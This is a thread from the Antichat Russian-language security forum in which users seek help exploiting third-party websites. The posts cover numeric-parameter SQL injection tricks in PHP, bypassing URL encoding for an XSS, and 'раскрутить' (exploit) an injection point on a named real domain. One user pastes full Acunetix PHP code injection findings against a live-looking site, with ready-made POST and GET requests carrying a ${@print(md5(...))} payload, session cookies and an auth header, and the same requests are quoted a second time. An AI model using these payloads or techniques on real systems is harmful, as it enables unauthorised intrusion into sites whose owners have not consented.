HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2851  
Старый 27.07.2020, 23:54
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от FireRidlle  
FireRidlle said:

можно что что сделать?
99.9% - ничего. В случае PHP, может выглядеть так:

Код:
Code:
var_dump(intval("1'"));
var_dump(intval("2-1")); 
var_dump(intval(-1));

int(1) //есть в бд
int(2) //есть в бд
int(-1) //нет такого, ошибка
 
Ответить с цитированием

  #2852  
Старый 29.07.2020, 02:18
neur0funk
Guest
Сообщений: n/a
Провел на форуме:
5363

Репутация: 12
По умолчанию

Цитата:
Сообщение от FireRidlle  
FireRidlle said:

здравствуйте. вопрос по валидации числовых параметров. есть параметр page. если передать 1' то возвращает первую страницу, 1" так же, 2-1 то вторую страницу. -1 ошибка. можно что что сделать?
если intval вожно большое число 92233720368547758079 +1 , в запрос попадёт 2e+, но это при условии старого пыха
 
Ответить с цитированием

  #2853  
Старый 23.08.2020, 19:58
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Хелп помогите раскрутить

Код:
Code:
https://www.egtexpress.com/cs/zeme/slovinsko"/?no_cache=1
 
Ответить с цитированием

  #2854  
Старый 26.08.2020, 16:37
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Привет Burp/Acunetix показывает XSS

site.com/ru/?'>alert(1)

Код:
Code:
alert(1)' />
Но в браузере происходит URL Encode

Код:
Code:
Вопрос есть тут или нет XSS? ведь и за URL Encode ничего не срабатывает.

Как эксплуатировать?
 
Ответить с цитированием

  #2855  
Старый 28.08.2020, 03:40
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

Привет Burp/Acunetix показывает XSS
site.com/ru/?'>alert(1)
Код:
Code:
alert(1)' />
Но в браузере происходит URL Encode
Код:
Code:
Вопрос есть тут или нет XSS? ведь и за URL Encode ничего не срабатывает.
Как эксплуатировать?
Юзать разные Tricks

Например для IE работает связка через 'location=URL' в чистом виде

Можно почитать подробнее у BlackFan - https://blog.blackfan.ru/2016/09/ie-location-bug.html
 
Ответить с цитированием

  #2856  
Старый 03.10.2020, 14:35
Gutman999
Guest
Сообщений: n/a
Провел на форуме:
3379

Репутация: 0
По умолчанию

Нашел php code injection на сайте, не ложную. Нашел гайд. Но там на странице авторизации проходит выполнения кода. У меня нет. Кто подскажет как выполнить уязвимость. Могу скинуть со сканера уязвимость
 
Ответить с цитированием

  #2857  
Старый 04.10.2020, 00:23
neur0funk
Guest
Сообщений: n/a
Провел на форуме:
5363

Репутация: 12
По умолчанию

Цитата:
Сообщение от Gutman999  
Gutman999 said:

Нашел php code injection на сайте, не ложную. Нашел гайд. Но там на странице авторизации проходит выполнения кода. У меня нет. Кто подскажет как выполнить уязвимость. Могу скинуть со сканера уязвимость
кидай
 
Ответить с цитированием

  #2858  
Старый 04.10.2020, 10:29
Gutman999
Guest
Сообщений: n/a
Провел на форуме:
3379

Репутация: 0
По умолчанию

Прошу прощения. PHP Code Injection

Код:
Code:
PHP code injection

Vulnerability description

This script is vulnerable to PHP code injection.

The vulnerability affects https://www.site.de/widget.php , 7521

Discovered by /Scripts/PerScheme/PHP_Code_Injection.script

Attack details

JSON input 7521 was set to ${@print(md5(acunetix_wvs_security_test))}

Possible execution result:

63c19a6da79816b21429e5bb262daed8

HTTP request

POST /widget.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: language=0;sid=v8o8b0le02vr097h6vbfes1cd0;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38;ga-disable-UA-27119953-1=true;tc_cj_v2=_rn_lh%5BfyfcheZZZ222H%7B%7D0%29%20/%243G-%20%21%20--%20-H%7D*%28ZZZKPJKNQLLLJOMKZZZ%5D;tCdebugLib=1;tc_custom_campaign=EXTERNAL_LINK@@@www.acunetix-referrer.com@@@1601474230887;tc_custom_cj=;tc_BasketFreeseSession=1;emos_jcvid=AXTfJhMocd6e1u6fAeE6klz_afKVWU7V:1:0:0:0:true:1
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 309
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

actcontrol=celebros&&cl=marm_klfilter_widget&filterForm[size][]=%24{%40print(md5(acunetix_wvs_security_test))}&fnc=submitFilterForm&listtype=qwiser&parentView=celebros&searchHandle=UVQxMGFHVl9RajEwYUdWX1J6MDNOVEl4WGpGX1NUMXdjbWxqWlg1TFBUUl9URDB4ZmswOU1YNU9QVE5f&searchparam=the&sortAscending=1&sortFieldName=1

Также есть GET запрос
URL encoded GET input searchparam was set to ${@print(md5(acunetix_wvs_security_test))}

Possible execution result:

63c19a6da79816b21429e5bb262daed8
HTTP request

GET /index.php?search=&cl=celebros&searchparam=%24{%40print(md5(acunetix_wvs_security_test))} HTTP/1.1
Connection: keep-alive
Cookie: language=0;sid=inoaht3jja8trerg9gr98il824;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
 
Ответить с цитированием

  #2859  
Старый 05.10.2020, 14:41
neur0funk
Guest
Сообщений: n/a
Провел на форуме:
5363

Репутация: 12
По умолчанию

Цитата:
Сообщение от Gutman999  
Gutman999 said:

Прошу прощения. PHP Code Injection
Код:
Code:
PHP code injection

Vulnerability description

This script is vulnerable to PHP code injection.

The vulnerability affects https://www.site.de/widget.php , 7521

Discovered by /Scripts/PerScheme/PHP_Code_Injection.script

Attack details

JSON input 7521 was set to ${@print(md5(acunetix_wvs_security_test))}

Possible execution result:

63c19a6da79816b21429e5bb262daed8

HTTP request

POST /widget.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Cookie: language=0;sid=v8o8b0le02vr097h6vbfes1cd0;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38;ga-disable-UA-27119953-1=true;tc_cj_v2=_rn_lh%5BfyfcheZZZ222H%7B%7D0%29%20/%243G-%20%21%20--%20-H%7D*%28ZZZKPJKNQLLLJOMKZZZ%5D;tCdebugLib=1;tc_custom_campaign=EXTERNAL_LINK@@@www.acunetix-referrer.com@@@1601474230887;tc_custom_cj=;tc_BasketFreeseSession=1;emos_jcvid=AXTfJhMocd6e1u6fAeE6klz_afKVWU7V:1:0:0:0:true:1
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 309
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

actcontrol=celebros&&cl=marm_klfilter_widget&filterForm[size][]=%24{%40print(md5(acunetix_wvs_security_test))}&fnc=submitFilterForm&listtype=qwiser&parentView=celebros&searchHandle=UVQxMGFHVl9RajEwYUdWX1J6MDNOVEl4WGpGX1NUMXdjbWxqWlg1TFBUUl9URDB4ZmswOU1YNU9QVE5f&searchparam=the&sortAscending=1&sortFieldName=1

Также есть GET запрос
URL encoded GET input searchparam was set to ${@print(md5(acunetix_wvs_security_test))}

Possible execution result:

63c19a6da79816b21429e5bb262daed8
HTTP request

GET /index.php?search=&cl=celebros&searchparam=%24{%40print(md5(acunetix_wvs_security_test))} HTTP/1.1
Connection: keep-alive
Cookie: language=0;sid=inoaht3jja8trerg9gr98il824;sid_key=oxid;cookieConsent=functional,marketing;bie_sCookieListId=dbb53ee616bcb82137ffd68e1d0e2f38
Authorization: Basic YW5vbnltb3VzOmFub255bW91cw==
Accept: */*
Accept-Encoding: gzip,deflate
Host: www.site.de
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
а хост какой?
 
Ответить с цитированием

  #2860  
Старый 08.10.2020, 14:56
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ